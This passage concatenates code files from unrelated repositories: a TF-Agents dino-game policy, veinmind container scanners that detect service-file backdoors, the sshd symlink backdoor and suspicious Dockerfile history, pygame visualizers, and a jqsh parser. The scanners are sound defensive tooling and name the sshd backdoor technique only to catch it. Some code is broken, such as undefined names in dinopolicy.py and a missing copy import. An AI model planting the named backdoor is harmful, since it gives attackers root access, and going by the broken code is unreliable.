loop.run_until_complete(asyncio.gather(*[start2() for _ in range(2000)]))
assert test_class.async_called == 1
``` |
{
"source": "jqquanbeck/hpc-dino-game",
"score": 2
} |
#### File: jqquanbeck/hpc-dino-game/dinopolicy.py
```python
from __future__ import absolute_import, division, print_function
import base64
import imageio
import IPython
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import PIL.Image
import pyvirtualdisplay
import tensorflow as tf
from tf_agents.agents.dqn import dqn_agent
from tf_agents.drivers import dynamic_step_driver
from tf_agents.environments import suite_gym
from tf_agents.environments import tf_py_environment
from tf_agents.eval import metric_utils
from tf_agents.metrics import tf_metrics
from tf_agents.networks import q_network
from tf_agents.policies import random_tf_policy
from tf_agents.replay_buffers import tf_uniform_replay_buffer
from tf_agents.trajectories import trajectory
from tf_agents.utils import common
from translator import *
class DinoPolicy(tf_policy.TFPolicy):
def __init__(self):
self._observation_spec = array_spec.BoundedArraySpec(
shape = (14,),
dtype = np.int32,
minimum = [0,0,0,0,0,0,0,0,0,0,0,0,0,0],
maximum = [
600,150,6, # Enemy 1
600,150,6, # Enemy 2
600,150,6, # Enemy 3
600,150,6, # Enemy 4
100,2147483647 # Dino Jump and Score
],
name = "observation"
)
self._action_spec = array_spec.BoundedArraySpec(
shape = (),
dtype = np.int32,
minimum = 0, # [Jump, None, Duck]
maximum = 2,
name = "action"
)
super(DinoPolicy, self).__init__(time_step_spec=time_step_spec,
action_spec=action_spec)
def _distribution(self, time_step):
pass
def _variables(self):
return ()
def _action(self, time_step, policy_state, seed):
observation_sign = tf.cast(tf.sign(time_step.observation[0]), dtype=tf.int32)
action = observation_sign + 1
return policy_step.PolicyStep(action, policy_state)
``` |
{
"source": "Jqqzzz/veinmind-tools",
"score": 2
} |
#### File: veinmind-backdoor/plugins/service.py
```python
from register import register
from common import *
import os
import re
@register.register("service")
class service():
service_dir_list = ["/etc/systemd/system"]
def detect(self, image):
results = []
for service_dir in self.service_dir_list:
for root, dirs, files in image.walk(service_dir):
for file in files:
try:
filepath = os.path.join(root, file)
f = image.open(filepath, mode="r")
f_content = f.read()
for backdoor_regex in regex.backdoor_regex_list:
if re.search(backdoor_regex, f_content):
r = result.Result()
r.image_id = image.id()
if len(image.reporefs()) > 0:
r.image_ref = image.reporefs()[0]
else:
r.image_ref = image.id()
r.filepath = filepath
r.description = "regex: " + backdoor_regex
results.append(r)
except FileNotFoundError:
continue
except BaseException as e:
log.logger.error(e)
return results
```
#### File: veinmind-backdoor/plugins/sshd.py
```python
from register import register
from common import log
from stat import *
from common import result
import os
@register.register("sshd")
class sshd():
"""
sshd 软连接后门检测插件,支持检测常规软连接后门
"""
rootok_list = ("su", "chsh", "chfn", "runuser")
def detect(self, image):
results = []
for root, dirs, files in image.walk("/"):
for f in files:
try:
filepath = os.path.join(root, f)
f_lstat = image.lstat(filepath)
if S_ISLNK(f_lstat.st_mode):
f_link = image.evalsymlink(filepath)
f_exename = filepath.split("/")[-1]
f_link_exename = f_link.split("/")[-1]
if f_exename in self.rootok_list and f_link_exename == "sshd":
r = result.Result()
r.image_id = image.id()
if len(image.reporefs()) > 0:
r.image_ref = image.reporefs()[0]
else:
r.image_ref = image.id()
r.filepath = filepath
r.description = "sshd symlink backdoor"
results.append(r)
except FileNotFoundError:
continue
except BaseException as e:
log.logger.error(e)
return results
```
#### File: veinmind-tools/veinmind-backdoor/register.py
```python
class register:
plugin_dict = {}
plugin_name = []
@classmethod
def register(cls, plugin_name):
def wrapper(plugin):
cls.plugin_dict[plugin_name] = plugin
return plugin
return wrapper
```
#### File: veinmind-tools/veinmind-history/scan.py
```python
from veinmind import *
import os, sys
import re
import pytoml as toml
sys.path.append(os.path.join(os.path.dirname(__file__), "../veinmind-common/python/service"))
sys.path.append(os.path.join(os.path.dirname(__file__), "./veinmind-common/python/service"))
from report import *
report_list = []
instruct_set = (
"FROM", "CMD", "RUN", "LABEL", "MAINTAINER", "EXPOSE", "ENV", "ADD", "COPY", "ENTRYPOINT", "VOLUME", "USER",
"WORKDIR",
"ARG", "ONBUILD", "STOPSIGNAL", "HEALTHCHECK", "SHELL")
def load_rules():
global rules
with open(os.path.join(os.path.abspath(os.path.dirname(__file__)), "rules.toml"), encoding="utf8") as f:
rules = toml.load(f)
def tab_print(printstr: str):
if len(printstr) < 95:
print(("| " + printstr + "\t|").expandtabs(100))
else:
char_count = 0
printstr_temp = ""
for char in printstr:
char_count = char_count + 1
printstr_temp = printstr_temp + char
if char_count == 95:
char_count = 0
print(("| " + printstr_temp + "\t|").expandtabs(100))
printstr_temp = ""
print(("| " + printstr_temp + "\t|").expandtabs(100))
@command.group()
@command.option("--output", default="stdout", help="output format e.g. stdout/json")
def cli(output):
load_rules()
pass
@cli.image_command()
def scan_images(image):
"""scan image abnormal history instruction"""
image_report = None
refs = image.reporefs()
if len(refs) > 0:
ref = refs[0]
else:
ref = image.id()
log.info("start scan: " + ref)
ocispec = image.ocispec_v1()
if 'history' in ocispec.keys() and len(ocispec['history']) > 0:
for history in ocispec['history']:
if 'created_by' in history.keys():
created_by = history['created_by']
created_by_split = created_by.split("#(nop)")
if len(created_by_split) > 1:
command = "#(nop)".join(created_by_split[1:])
command = command.lstrip()
command_split = command.split()
if len(command_split) == 2:
instruct = command_split[0]
command_content = command_split[1]
for r in rules["rules"]:
if r["instruct"] == instruct:
if re.match(r["match"], command_content):
detail = AlertDetail()
detail.history_detail = HistoryDetail(
instruction=instruct, content=command_content,
description=r["match"]
)
image_report = ReportEvent(id=image.id(),
level=Level.High.value, detect_type=DetectType.Image.value,
event_type=EventType.Risk.value,
alert_type=AlertType.AbnormalHistory.value,
alert_details=[detail])
report(image_report)
break
else:
instruct = command_split[0]
command_content = " ".join(command_split[1:])
for r in rules["rules"]:
if r["instruct"] == instruct:
if re.match(r["match"], command_content):
detail = AlertDetail()
detail.history_detail = HistoryDetail(
instruction=instruct, content=command_content,
description=r["match"]
)
image_report = ReportEvent(id=image.id(),
level=Level.High.value, detect_type=DetectType.Image.value,
event_type=EventType.Risk.value,
alert_type=AlertType.AbnormalHistory.value,
alert_details=[detail])
report(image_report)
break
else:
command_split = created_by.split()
if command_split[0] in instruct_set:
for r in rules["rules"]:
if r["instruct"] == command_split[0]:
if re.match(r["match"], " ".join(command_split[1:])):
detail = AlertDetail()
detail.history_detail = HistoryDetail(
instruction=command_split[0],
content=" ".join(command_split[1:]),
description=r["match"]
)
image_report = ReportEvent(id=image.id(),
level=Level.High.value, detect_type=DetectType.Image.value,
event_type=EventType.Risk.value,
alert_type=AlertType.AbnormalHistory.value,
alert_details=[detail])
report(image_report)
break
else:
for r in rules["rules"]:
if r["instruct"] == "RUN":
if re.match(r["match"], created_by):
detail = AlertDetail()
detail.history_detail = HistoryDetail(
instruction="RUN", content=created_by,
description=r["match"]
)
image_report = ReportEvent(id=image.id(),
level=Level.High.value, detect_type=DetectType.Image.value,
event_type=EventType.Risk.value,
alert_type=AlertType.AbnormalHistory.value,
alert_details=[detail])
report(image_report)
break
if image_report != None:
report_list.append(image_report)
@cli.resultcallback()
def callback(result, output):
if output == "stdout" and len(report_list) > 0:
print("# ================================================================================================= #")
tab_print("Scan Image Total: " + str(len(report_list)))
tab_print("Unsafe Image List: ")
for r in report_list:
if len(r.alert_details) == 0:
continue
print(
"+---------------------------------------------------------------------------------------------------+")
tab_print("ImageName: " + r.id)
tab_print("Abnormal History Total: " + str(len(r.alert_details)))
for detail in r.alert_details:
if detail.history_detail:
tab_print("History: " + detail.history_detail.content)
print("+---------------------------------------------------------------------------------------------------+")
elif output == "json":
with open("output.json", mode="w") as f:
f.write(jsonpickle.dumps(report_list))
if __name__ == '__main__':
cli.add_info_command(manifest=command.Manifest(name="veinmind-history", author="veinmind-team", description="veinmind-history scan image abnormal history"))
cli()
``` |
{
"source": "jqrsound/EYESY_OS_for_RasPiSound",
"score": 3
} |
#### File: Python/S - A Zach Reactive/main.py
```python
import pygame
import pygame.gfxdraw
import random
import time
import math
from pygame.locals import *
# original code adapted from <NAME>'s talk
# https://www.youtube.com/watch?v=bmztlO9_Wvo
white=(255,255,255)
w1 = 0
h1 = 0
def setup(screen, etc) :
global w1,h1
w1 = screen.get_width()
h1 = screen.get_height()
pass
def draw(screen, etc):
global w1,h1
etc.color_picker_bg(etc.knob5)
#for i in range(320):
for i in range((h1 / 2) - 10):
i=i*2
color = (int(127 + 120 * math.sin(i * .01 + time.time())),
int(127 + 120 * math.sin(i * (.01 + etc.knob4*.01) + time.time())),
int(127 + 120 * math.sin(i * (.01 + etc.knob4*.02)+ time.time())))
r1= (abs(etc.audio_in[i/50]/900))
radius_1 = int(100 + r1+40 * math.sin(i * (etc.knob1 * .05)+.0001 + time.time()))
radius1 = int(etc.knob3 * radius_1)
radius_2 = int( 70 + r1 - 20 * math.sin(i * (etc.knob2 * .2)+.0001 + time.time()))
radius2 = int(etc.knob3 * radius_2)
xoffset1 = i
xpos1 = int(((w1 / 2)-i) * math.sin(i * .01 + (time.time()*0.3)) + (w1 / 2-i) + xoffset1)+ int(r1*1.5)
xpos2 = int(((w1 / 2)-i) * math.sin(i * .01 + (time.time()*0.3)) + (w1 / 2-i) + xoffset1+(h1 / 2))+ int(r1*1.5)#int(w1 // 2 + 100 * math.sin(i * .02 + time.time())*1.3)+(h1 / 2)+ int(r1*1.5)#-int(etc.knob1*(720-i))
xpos3 = int(((w1 / 2)-i) * math.sin(i * .01 + (time.time()*0.3)) + (w1 / 2-i) + xoffset1-+(h1 / 2))+ int(r1*1.5)#int(w1 // 2 + 100 * math.sin(i * .02 + time.time())*1.2)-(h1 / 2)+ int(r1*1.5)#-int(etc.knob1*(720-i))
rect2 = Rect(xpos2, i, radius2*1.5, radius2*1.5)
radius3=int(radius2+10+10 *(math.sin(i * (etc.knob2 * .2) + time.time())))
radius4=int(radius2+10+10 *(math.cos(i * (etc.knob1 * .2) + time.time())))
pygame.gfxdraw.circle(screen, xpos1, i, radius1, color)
pygame.gfxdraw.rectangle(screen, rect2, color)
pygame.gfxdraw.ellipse(screen, xpos3, i, radius3, radius4, color)
#pygame.gfxdraw.circle(screen, xpos3, i, radius2, color)
#pygame.gfxdraw.filled_circle(screen, xpos1, i, radius1, color)
#pygame.gfxdraw.filled_circle(screen, xpos2, i, radius2, color)
#pygame.gfxdraw.filled_circle(screen, xpos3, i, radius2, color)
#pygame.gfxdraw.circle(screen, xpos1, i, radius1, white )
#pygame.gfxdraw.circle(screen, xpos2, i, radius2, white )
#pygame.gfxdraw.circle(screen, xpos3, i, radius2, white )
```
#### File: Python/S - A Zach Spiral 01/main.py
```python
import pygame
import pygame.gfxdraw
import random
import time
import math
from pygame.locals import *
# original code adapted from <NAME>'s talk
# https://www.youtube.com/watch?v=bmztlO9_Wvo
#http://www.mathrecreation.com/2016/10/some-familiar-spirals-in-desmos.html
white=(255,255,255)
w1 = 0
h1 = 0
def setup(screen, etc) :
global w1,h1
w1 = screen.get_width()
h1 = screen.get_height()
pass
def draw(screen, etc):
global w1,h1
etc.color_picker_bg(etc.knob5)
#for i in range(320):
k=int(((h1 ))+((h1 )) *(math.sin(time.time()*(.1+etc.knob2*2))))
j=int(((h1 / 2)-10)+((h1 / 2)-10) *(math.cos(time.time()*(.8+1+etc.knob2))))
l=int((h1 )-25)-k
for i in range(0, (h1 +20) , 1):#+int(etc.knob1*15)):
i=i*2
color = (int(127 + 120 * math.sin(i * .01 + time.time())),
int(127 + 120 * math.sin(i * (.01 + etc.knob5*.01) + time.time())),
int(127 + 120 * math.sin(i * (.01 + etc.knob5*.02)+ time.time())))
r1= (abs(etc.audio_in[i%100]))#300
radius_2 = int( 50 - 20 * math.sin(i * (etc.knob2 * .2)+.0001 + time.time()))
radius2 = int((etc.knob3/2) * radius_2+(.4+etc.knob2/3)*(r1/400))
xoffset1 = i
xpos3= (w1 / 2)
ypos2 = (h1/2)
xpos4=int(xpos3+(20*etc.knob2+1)*math.sqrt(i)*math.cos(i*((1+math.sqrt(5)*math.pi/(math.pi+12*etc.knob1)))))
ypos3=int(ypos2+(20*etc.knob2+1)*math.sqrt(i)*math.sin(i*((1+math.sqrt(5)*math.pi/(math.pi+12*etc.knob1)))))
rect3 = Rect(xpos4, ypos3, radius2*1.5, radius2*1.5)
radius3=int(radius2+ (math.sin(i * (etc.knob2 * .2) + time.time())))
radius4=int(radius2+ (math.cos(i * (etc.knob2 * .2) + time.time())))
if (k-((h1*2)+30)*etc.knob4-5) <= i <= (k+((h1*2)+30)*etc.knob4+5) :
pygame.gfxdraw.ellipse(screen, xpos4, ypos3, radius3, radius4, color)
``` |
{
"source": "jq-shell/python-jqsh",
"score": 3
} |
#### File: python-jqsh/jqsh/context.py
```python
class FilterContext:
def __copy__(self):
ret = FilterContext()
ret.argv = self.argv[:]
ret.is_main = self.is_main
return ret
def __init__(self):
"""Creates the default context."""
import jqsh.functions
self.argv = []
self.get_builtin = jqsh.functions.get_builtin
self.is_main = True
@classmethod
def command_line_context(cls, argv):
ret = cls()
ret.argv = list(argv)
return ret
def imported(self):
"""Returns a copy of self with is_main set to False."""
ret = copy.copy(self)
ret.is_main = False
return ret
```
#### File: python-jqsh/jqsh/parser.py
```python
import decimal
import enum
import jqsh.context
import jqsh.filter
import jqsh.values
import string
import unicodedata
class Incomplete(Exception):
pass
TokenType = enum.Enum('TokenType', [
'assign',
'close_array',
'close_object',
'close_paren',
'colon',
'comma',
'command',
'comment',
'dot',
'format_string',
'global_variable',
'illegal',
'minus',
'modulo',
'multiply',
'name',
'number',
'open_array',
'open_object',
'open_paren',
'pipe',
'plus',
'semicolon',
'string',
'string_end',
'string_end_incomplete',
'string_incomplete',
'string_middle',
'string_start',
'trailing_whitespace'
], module=__name__)
class Token:
def __eq__(self, other):
return self.type is other.type and self.text == other.text
def __init__(self, token_type, token_string=None, text=None, line=None, column=None):
self.type = token_type
self.string = token_string # ''.join(token.string for token in tokenize(jqsh_string)) == jqsh_string
self.text = text # metadata like the name of a name token or the digits of a number literal. None for simple tokens
self.line = line
self.column = column
def __repr__(self):
return 'jqsh.parser.Token(' + repr(self.type) + ('' if self.string is None else ', token_string=' + repr(self.string)) + ('' if self.text is None else ', text=' + repr(self.text)) + ')'
def __str__(self):
if self.string is None:
return "'" + repr(self) + "'"
else:
return self.string
atomic_tokens = {
TokenType.name: jqsh.filter.Name,
TokenType.number: jqsh.filter.NumberLiteral,
TokenType.string: jqsh.filter.StringLiteral
}
escapes = { # string literal escape sequences, sans \u and \(
'"': '"',
'/': '/',
'\\': '\\',
'b': '\b',
'f': '\f',
'n': '\n',
'r': '\r',
't': '\t'
}
json_tokens = [ # token types that are allowed in pure JSON
TokenType.close_array,
TokenType.close_object,
TokenType.colon,
TokenType.comma,
TokenType.name,
TokenType.number,
TokenType.open_array,
TokenType.open_object,
TokenType.string
]
keyword_paren_filters = {
'if': jqsh.filter.Conditional,
'try': jqsh.filter.Try
}
keyword_parens = { # a dictionary that maps starting keywords of keyword parens to the possible inner keywords. All keyword parens end with the “end” keyword.
'if': {'then', 'elif', 'elseIf', 'else'},
'try': {'catch', 'then', 'except', 'else'}
}
matching_parens = { # a dictionary that maps opening parenthesis-like tokens (parens) to the associated closing parens
TokenType.open_array: TokenType.close_array,
TokenType.open_object: TokenType.close_object,
TokenType.open_paren: TokenType.close_paren
}
operators = [
{
'binary': False,
TokenType.command: jqsh.filter.Command,
TokenType.global_variable: jqsh.filter.GlobalVariable
},
{
TokenType.dot: jqsh.filter.Apply
},
'variadic apply',
{
TokenType.multiply: jqsh.filter.Multiply
},
{
TokenType.plus: jqsh.filter.Add
},
{
TokenType.colon: jqsh.filter.Pair
},
{
TokenType.comma: jqsh.filter.Comma
},
{
TokenType.assign: jqsh.filter.Assign
},
{
'rtl': True,
TokenType.pipe: jqsh.filter.Pipe
},
{
TokenType.semicolon: jqsh.filter.Semicolon
}
]
paren_filters = {
TokenType.open_array: jqsh.filter.Array,
TokenType.open_object: jqsh.filter.Object,
TokenType.open_paren: jqsh.filter.Parens
}
symbols = {
'!': TokenType.command,
'$': TokenType.global_variable,
'%': TokenType.modulo,
'(': TokenType.open_paren,
')': TokenType.close_paren,
'*': TokenType.multiply,
'+': TokenType.plus,
',': TokenType.comma,
'-': TokenType.minus,
'.': TokenType.dot,
':': TokenType.colon,
';': TokenType.semicolon,
'=': TokenType.assign,
'@': TokenType.format_string,
'[': TokenType.open_array,
']': TokenType.close_array,
'{': TokenType.open_object,
'|': TokenType.pipe,
'}': TokenType.close_object
}
def illegal_token_exception(token, position=None, expected=None, line_numbers=False):
if token.type is TokenType.illegal and token.text:
return SyntaxError('illegal character' + ((' in line ' + str(token.line) if line_numbers and token.line is not None else '') if position is None else ' at position ' + repr(position)) + ': ' + repr(token.text[0]) + ' (U+' + format(ord(token.text[0]), 'x').upper() + ' ' + unicodedata.name(token.text[0], 'unknown character') + ')')
else:
return SyntaxError('illegal ' + ('' if token.type is TokenType.illegal else token.type.name + ' ') + 'token' + ((' in line ' + str(token.line) if line_numbers and token.line is not None else '') if position is None else ' at position ' + repr(position)) + ('' if expected is None else ' (expected ' + ' or '.join(sorted(expected_token_type.name for expected_token_type in expected)) + ')'))
def parse(tokens, *, line_numbers=False, allowed_filters={'default': True}, context=jqsh.context.FilterContext()):
def filter_is_allowed(the_filter):
if isinstance(allowed_filters, dict):
if the_filter.__class__ in allowed_filters:
if isinstance(allowed_filters[the_filter.__class__], bool):
return allowed_filters[the_filter.__class__]
else:
return allowed_filters[the_filter.__class__](the_filter)
else:
if isinstance(allowed_filters.get('default', False), bool):
return allowed_filters.get('default', False)
else:
return allowed_filters['default'](the_filter)
elif the_filter.__class__ in allowed_filters:
return True
else:
return False
def make_keyword_paren_filter(attributes):
attributes = list(attributes)
return keyword_paren_filters[attributes[0][0]]((attribute_name, parse(attribute_tokens, line_numbers=line_numbers, allowed_filters=allowed_filters, context=context)) for attribute_name, attribute_tokens in attributes)
def raise_for_filter(the_filter):
if filter_is_allowed(the_filter):
return the_filter
else:
raise jqsh.filter.NotAllowed('disallowed filter: ' + str(the_filter))
if isinstance(tokens, str):
tokens = list(tokenize(tokens))
tokens = [token for token in tokens if isinstance(token, jqsh.filter.Filter) or token.type is not TokenType.comment]
if not len(tokens):
return raise_for_filter(jqsh.filter.Filter()) # token list is empty, return an empty filter
for token in tokens:
if token.type is TokenType.illegal:
raise illegal_token_exception(token, line_numbers=line_numbers)
if isinstance(tokens[-1], Token) and tokens[-1].type is TokenType.trailing_whitespace:
if len(tokens) == 1:
return raise_for_filter(jqsh.filter.Filter()) # token list consists entirely of whitespace, return an empty filter
else:
tokens[-2].string += tokens[-1].string # merge the trailing whitespace into the second-to-last token
tokens.pop() # remove the trailing_whitespace token
# parenthesis-like filters
paren_balance = 0
paren_start = None
middle_keywords = []
for i, token in reversed(list(enumerate(tokens))): # iterating over the token list in reverse because we modify it in the process
if not isinstance(token, Token):
continue
elif token.type in matching_parens.values() or token == Token(TokenType.name, text='end'):
if paren_balance == 0:
paren_start = i
if token == Token(TokenType.name, text='end'):
middle_keywords = []
paren_balance += 1
elif token.type in matching_parens.keys() or token.type is TokenType.name and token.text in keyword_parens.keys():
paren_balance -= 1
if paren_balance < 0:
raise Incomplete('too many opening parens of type ' + repr(token.text if token.type is TokenType.name else token.type))
elif paren_balance == 0:
if token.type is TokenType.name:
middle_keywords = [index for index in middle_keywords if tokens[index].text in keyword_parens[token.text]]
attributes = []
last_index = paren_start
for index in middle_keywords:
attributes.append((tokens[index].text, tokens[index + 1:last_index]))
last_index = index
attributes.append((token.text, tokens[i + 1:last_index]))
tokens[i:paren_start + 1] = [raise_for_filter(make_keyword_paren_filter(reversed(attributes)))]
else:
if matching_parens[token.type] is tokens[paren_start].type:
tokens[i:paren_start + 1] = [raise_for_filter(paren_filters[token.type](attribute=parse(tokens[i + 1:paren_start], line_numbers=line_numbers, allowed_filters=allowed_filters)))] # parse the inside of the parens
else:
raise SyntaxError('opening paren of type ' + repr(token.type) + ' does not match closing paren of type ' + repr(tokens[paren_start].type))
paren_start = None
elif paren_balance == 1 and token.type is TokenType.name:
middle_keywords.append(i)
if paren_balance != 0:
raise SyntaxError('mismatched parens')
# atomic filters
for i, token in reversed(list(enumerate(tokens))):
if isinstance(token, Token) and token.type in atomic_tokens:
tokens[i] = raise_for_filter(atomic_tokens[token.type](token.text))
# operators
for precedence_group in operators:
if precedence_group == 'variadic apply':
start = None
for i, token in reversed(list(enumerate(tokens))):
if isinstance(token, jqsh.filter.Filter):
if start is None:
start = i
else:
if start is not None and start > i + 1:
tokens[i + 1:start + 1] = [raise_for_filter(jqsh.filter.Apply(*tokens[i + 1:start + 1]))]
start = None
if start is not None and start > 0:
tokens[:start + 1] = [raise_for_filter(jqsh.filter.Apply(*tokens[:start + 1]))]
continue
if not precedence_group.get('binary', True):
for i, token in reversed(list(enumerate(tokens))):
if isinstance(token, Token) and token.type in precedence_group:
if len(tokens) == i + 1:
raise SyntaxError('expected a filter after ' + repr(token) + ', nothing found')
elif isinstance(tokens[i + 1], Token):
raise SyntaxError('expected a filter after ' + repr(token) + ', found ' + repr(tokens[i + 1]) + ' instead')
tokens[i:i + 2] = [raise_for_filter(precedence_group[token.type](attribute=tokens[i + 1]))]
continue
ltr = not precedence_group.get('rtl', False)
if ltr:
tokens.reverse()
left_operand = None
right_operand = None
has_previous_operand = False
has_next_operand = False
for i, token in reversed(list(enumerate(tokens))):
if isinstance(token, jqsh.filter.Filter) and has_next_operand:
tokens[i:i + (3 if has_previous_operand else 2)] = [precedence_group[tokens[i + 1].type](left=left_operand, right=right_operand)]
has_next_operand = False
elif isinstance(token, Token) and token.type in precedence_group:
left_operand, has_left_operand = (tokens[i - 1], True) if i > 0 and isinstance(tokens[i - 1], jqsh.filter.Filter) else (raise_for_filter(jqsh.filter.Filter()), False)
right_operand, has_right_operand = (tokens[i + 1], True) if i + 1 < len(tokens) and isinstance(tokens[i + 1], jqsh.filter.Filter) else (raise_for_filter(jqsh.filter.Filter()), False)
has_previous_operand = has_right_operand
has_next_operand = has_left_operand
if ltr:
left_operand, right_operand = right_operand, left_operand
has_left_operand, has_right_operand = has_right_operand, has_left_operand
if not has_next_operand:
tokens[i:i + (2 if has_previous_operand else 1)] = [precedence_group[token.type](left=left_operand, right=right_operand)]
else:
has_next_operand = False
if ltr:
tokens.reverse()
if len(tokens) == 1 and isinstance(tokens[0], jqsh.filter.Filter):
return tokens[0] # finished parsing
else:
raise SyntaxError('Could not parse token list: ' + repr(tokens))
def parse_json(tokens, allow_extension_types=False):
if isinstance(tokens, str):
tokens = list(tokenize(tokens))
if len(tokens) == 0 or len(tokens) == 1 and isinstance(tokens[0], Token) and tokens[0].type is TokenType.trailing_whitespace:
raise Incomplete('JSON is empty')
if isinstance(tokens[-1], Token) and tokens[-1].type is TokenType.trailing_whitespace:
tokens.pop()
ret_path = []
key = None
token_index = 0
while token_index < len(tokens):
token = tokens[token_index]
if allow_extension_types and isinstance(token, jqsh.values.Value):
ret_path = set_value_at_ret_path(ret_path, key, token)
token_index += 1
elif token.type is TokenType.name:
if token.text == 'false':
ret_path = set_value_at_ret_path(ret_path, key, jqsh.values.Boolean(False))
token_index += 1
elif token.text == 'null':
ret_path = set_value_at_ret_path(ret_path, key, jqsh.values.Null())
token_index += 1
elif token.text == 'true':
ret_path = set_value_at_ret_path(ret_path, key, jqsh.values.Boolean(True))
token_index += 1
else:
raise SyntaxError('Illegal name token ' + repr(token.text) + ' at position ' + repr(token_index) + ' (expected false, null, or true)')
elif token.type is TokenType.number:
ret_path = set_value_at_ret_path(ret_path, key, jqsh.values.Number(token.text))
token_index += 1
elif token.type is TokenType.open_array:
array = jqsh.values.Array(terminated=False)
ret_path = set_value_at_ret_path(ret_path, key, array)
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON array at position ' + str(token_index))
if tokens[token_index].type is TokenType.close_array: # empty array parsed
array.terminate()
token_index += 1
else:
ret_path.append(array)
continue
elif token.type is TokenType.open_object:
obj = jqsh.values.Object(terminated=False)
ret_path = set_value_at_ret_path(ret_path, key, obj)
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
token = tokens[token_index]
if token.type is TokenType.close_object: # empty object parsed
obj.terminate()
token_index += 1
elif token.type is TokenType.string:
ret_path.append(obj)
key = token.text
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
elif tokens[token_index].type is not TokenType.colon:
raise illegal_token_exception(token, position=token_index, expected={TokenType.colon})
else:
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
continue
else:
raise illegal_token_exception(token, position=token_index, expected={TokenType.close_object, TokenType.string})
elif token.type is TokenType.string:
ret_path = set_value_at_ret_path(ret_path, key, token.text)
token_index += 1
else:
raise illegal_token_exception(token, position=token_index, expected={TokenType.name, TokenType.number, TokenType.open_array, TokenType.open_object, TokenType.string, TokenType.trailing_whitespace})
keep_closing = True
while keep_closing and len(ret_path) > 1:
if isinstance(ret_path[-1], jqsh.values.Object): # we are in an object, get the next key or close it
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
token = tokens[token_index]
if token.type is TokenType.close_object:
ret_path[-1].terminate()
if len(ret_path) == 1:
keep_closing = False
else:
ret_path.pop()
token_index += 1
elif token.type is TokenType.comma:
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
token = tokens[token_index]
if token.type is TokenType.string:
key = token.text
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
elif tokens[token_index].type is not TokenType.colon:
raise illegal_token_exception(token, position=token_index, expected={TokenType.colon})
else:
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
keep_closing = False
else:
raise illegal_token_exception(token, position=token_index, expected={TokenType.string})
else:
raise illegal_token_exception(token, position=token_index, expected={TokenType.close_object, TokenType.comma})
else: # we are in an array, check if it continues
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON array at position ' + str(token_index))
token = tokens[token_index]
if token.type is TokenType.close_array:
ret_path[-1].terminate()
if len(ret_path) == 1:
keep_closing = False
else:
ret_path.pop()
token_index += 1
elif token.type is TokenType.comma:
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON array at position ' + str(token_index))
keep_closing = False
else:
raise illegal_token_exception(token, position=token_index, expected={TokenType.close_array, TokenType.comma})
if token_index < len(tokens):
raise SyntaxError('Multiple top-level JSON values found')
return ret_path[0]
def parse_json_values(tokens):
if isinstance(tokens, str):
tokens = list(tokenize(tokens))
if len(tokens) and tokens[-1].type is TokenType.trailing_whitespace:
tokens = tokens[:-1]
prefix_length = 1
last_exception = None
while len(tokens):
if prefix_length > len(tokens):
raise last_exception
try:
yield parse_json(tokens[:prefix_length])
tokens = tokens[prefix_length:]
prefix_length = 1
except Incomplete as e:
last_exception = e
prefix_length += 1
def set_value_at_ret_path(ret_path, key, value):
if len(ret_path):
if isinstance(ret_path[-1], jqsh.values.Object):
ret_path[-1].push((key, value))
else:
ret_path[-1].push(value)
return ret_path
else:
return [value]
def tokenize(jqsh_string):
def shift(rest_string, line, column, amount=1):
for _ in range(amount):
removed_character = rest_string[0]
rest_string = rest_string[1:]
if removed_character == '\n':
line += 1
column = 0
else:
column += 1
return rest_string, line, column
rest_string = jqsh_string
if not isinstance(rest_string, str):
rest_string = rest_string.decode('utf-8')
whitespace_prefix = ''
if rest_string.startswith('\ufeff'):
whitespace_prefix += rest_string[0]
rest_string = rest_string[1:]
line = 1
column = 0
parens_stack = []
while len(parens_stack) and parens_stack[-1] < 0 or len(rest_string):
if len(parens_stack) and parens_stack[-1] < 0 or rest_string[0] == '"':
if len(parens_stack) and parens_stack[-1] < 0:
token_type = TokenType.string_end_incomplete
string_literal = ')'
parens_stack.pop()
string_start_line = line
string_start_column = column - 1
else:
rest_string, line, column = shift(rest_string, line, column)
token_type = TokenType.string_incomplete
string_literal = '"'
string_start_line = line
string_start_column = column
string_content = ''
while len(rest_string):
if rest_string[0] == '"':
token_type = {
TokenType.string_end_incomplete: TokenType.string_end,
TokenType.string_incomplete: TokenType.string
}[token_type]
string_literal += '"'
rest_string, line, column = shift(rest_string, line, column)
break
elif rest_string[0] == '\\':
rest_string, line, column = shift(rest_string, line, column)
if rest_string[0] in escapes:
string_literal += '\\' + rest_string[0]
string_content += escapes[rest_string[0]]
rest_string, line, column = shift(rest_string, line, column)
elif rest_string[0] == 'u':
try:
escape_sequence = int(rest_string[1:5], 16)
except (IndexError, ValueError):
yield Token(token_type, token_string=whitespace_prefix + string_literal, text=string_content, line=string_start_line, column=string_start_column)
yield Token(TokenType.illegal, token_string=whitespace_prefix + rest_string, text=rest_string, line=line, column=column)
return
else:
string_literal += '\\' + rest_string[:5]
string_content += chr(escape_sequence) #TODO check for UTF-16 surrogate characters
rest_string, line, column = shift(rest_string, line, column, amount=5)
elif rest_string[0] == '(':
string_literal += '\\('
parens_stack.append(0)
token_type = {
TokenType.string_end_incomplete: TokenType.string_middle,
TokenType.string_incomplete: TokenType.string_start
}[token_type]
rest_string, line, column = shift(rest_string, line, column)
break
else:
yield Token(token_type, token_string=whitespace_prefix + string_literal, text=string_content, line=string_start_line, column=string_start_column)
yield Token(TokenType.illegal, token_string=whitespace_prefix + '\\' + rest_string, text='\\' + rest_string, line=line, column=column)
return
else:
string_literal += rest_string[0]
string_content += rest_string[0]
rest_string, line, column = shift(rest_string, line, column)
yield Token(token_type, token_string=whitespace_prefix + string_literal, text=string_content, line=string_start_line, column=string_start_column)
whitespace_prefix = ''
elif rest_string[0] in string.whitespace:
whitespace_prefix += rest_string[0]
